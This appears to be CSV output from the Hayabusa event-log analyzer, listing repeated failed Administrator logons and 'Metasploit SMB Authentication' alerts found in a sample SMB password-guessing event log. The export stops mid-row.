Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYLMax3okIqntHM1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qk9TPAK51EdVORwY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVKRUnNu2nGslW7P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJ2AYRLcMbMVixg6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Sl9ucxM2Nu3xjNq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AFeBGB6qA7OaYV7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLUEKG9CzQYsH3Vp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVZ44YKdRYY59zaC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: umU8pDDZFvvUVsHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nn7rA0uRegtHgaF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dgiakCKweT4GUGD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kptipiLujNVePYfy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: plaXJ1rEGpU3SzV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I4pALF2luLfg36GC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZLO4cufbFcRhRy8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a845OfrFKxy31Yhg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QnPM7uhs8y4BaP6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fW5FzQ4jbWDJxXc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huKy3ruTPAlx94pI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g78Kx7hkMuUGIoX1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: erSXtXvMi8Cg1PWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VaqXgO2US87zoXLl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHEfAfFuAR2pX3LO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4Owk2elGaC5DOm1U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VXPynWzVNADN56a4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwfwZ0hXFaFwqymH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYlZwLsvrsuqUZ4q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvGrzr30eVl5TGhA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tqdJcHWbdGcIIHBr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDt69bIJ1yI6PXLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtE2uMuOe8QPAKOj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BWQDlZDgFj9NmMhJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncQiyLyHCXr8knGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XjVmLfmcPMYbmdin : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gU2HjzjDxHsnvENI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cUPn5CEz2LtwRwvZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCz069oBFXqpshbU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dzhc9PVRVP69tshD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejA3ZNfKWEs8zAMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U5egiL2PGOrYCHv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYhIM3zla6KcbKbM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjyQJnVBO4iC9Tkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g6Tpp8TRa2nRxHzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DyLvo5Bn2HzyANdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaXNThuZDGqJ7oCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 42Sb7p19cQsEV30b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: An6629wgflzSgqY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 